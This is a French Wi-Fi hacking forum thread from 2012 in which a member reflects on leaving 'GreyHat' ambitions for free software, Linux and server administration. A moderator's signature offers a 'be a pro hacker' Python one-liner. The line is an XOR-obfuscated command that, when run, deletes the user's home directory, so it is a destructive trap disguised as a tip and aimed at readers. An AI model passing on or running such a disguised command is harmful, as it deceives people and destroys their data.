Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 24-01-2012 10:42:04

G.Alex-713
Membre

3 ans plus tard... du moins je croyais

Bonjour, je crée cette discussion après être revenu sur ce forum par nostalgie, en effet je crois bien que c'est ici que j'ai un peu appris je vrai sens du mot hacking, c'est donc aussi pour remercier ceux qui m'on secoué et redirigé vers la bonne voie.
Je suis donc retourné sur ce forum pour me revoir dans l'ancien temps, où régnais encore en moi quelques ambitions GreyHat, pour voir ce post que j'avais fait, vraiment ridicule, quand je me suis relu, j'ai vraiment été très surpris, parce que la moitié des choses qui, d'après cette discussion, j'ignorais complètement, je les maîtrise très bien aujourd'hui ! mais ce qui m'a réellement surpris le plus, et ce qui a d'ailleurs donné le titre à cette discussion, c'est quand j'ai vu la date: en effet, j'avais tellement changé, et tellement d'eau avait coulé sous les ponts, que j'était persuadé que ça faisait 3 ans ! Comme j'ai été surpris quand j'ai vu "2011" en haut à droite... J'en reviens pas d'avoir tellement évolué en si peut de temps... mon ego vient d'en prendre un coup... (dans l'autre sens du terme, mauavis pour moi qui passe tout le temps pour un prétentieux...)

Ce post est donc là pour remercier ce qui m'on aidé, et pour tous ceux qui sont ou on été comme moi à ce moment là.

Aujourd'hui le pentest et l'offensive n'est plus vraiment ma principale passion, même si je me plait beaucoup (énormément même) à résoudre toute sortes de challenges de web-hacking, mais aussi de crypto, stega, programmation etc.

Je suis passé sous GNU/Linux depuis (et devenu ce que certains troll appellerais un "stallmanien fag" mdrr) système que j'apprécie beaucoup d'ailleurs, je suis devenu un véritable fan du libre, et comme cité plus tôt, un fan de rms, je me met à tiquer quand j'entend le son du démarrage de Windows, et le thème Windows XP me fait mal aux yeux, et je soupir dès que je vois quelqu'un utiliser un logiciel payant dont il existe un équivalent libre (souvent plus complet et performant), comprenez que je suis gravement atteint (je me retiens de critiquer les utilisateurs de Windows smile faut pas troller non-plus, Windows, selon les utilisations, peut être un très bon sytème d'exploitation (pour ne pas mentir tout ça je ne le pense pas)) tellement que je compte, pour encore mieux en profiter, quitter Ubuntu pour construire ma propre distribution GNU/Linux (entièrement libre) à l'aide de LFS.

J'ai également un serveur, à l'adresse galex-713.tk, qui fais serveur web, ftp(depuis que j'ai recompilé proftpd à la main, je ne trouve plus comment réactiver la connexion anonyme), irc, et bientôt mail et svn, sous Debian, mais je compte lui aussi le mettre sous une distrib' faite avec LFS.
Tout ceci à but d'apprentissage, notamment en sécurisation de serveur, mais aussi parce que c'est toujours sympa d'être indépendant smile
J'ai posté ma présentation pour repartir du bon pied sur ce forum: http://www.crack-wifi.com/forum/viewtop … 415#p54415

Donc merci à tous, et je laisse ouverte cette discussion à l'honneur de tout ceux qui on été comme moi à une époque (même très courte) et qui on changé wink

À bientôt

Dernière modification par G.Alex-713 (24-01-2012 19:49:41)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-01-2012 12:01:55

spawn
Modérateur

Re : 3 ans plus tard... du moins je croyais

Une bonne chose de faite !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 29-01-2012 19:48:25

G.Alex-713
Membre

Re : 3 ans plus tard... du moins je croyais

smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.022 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]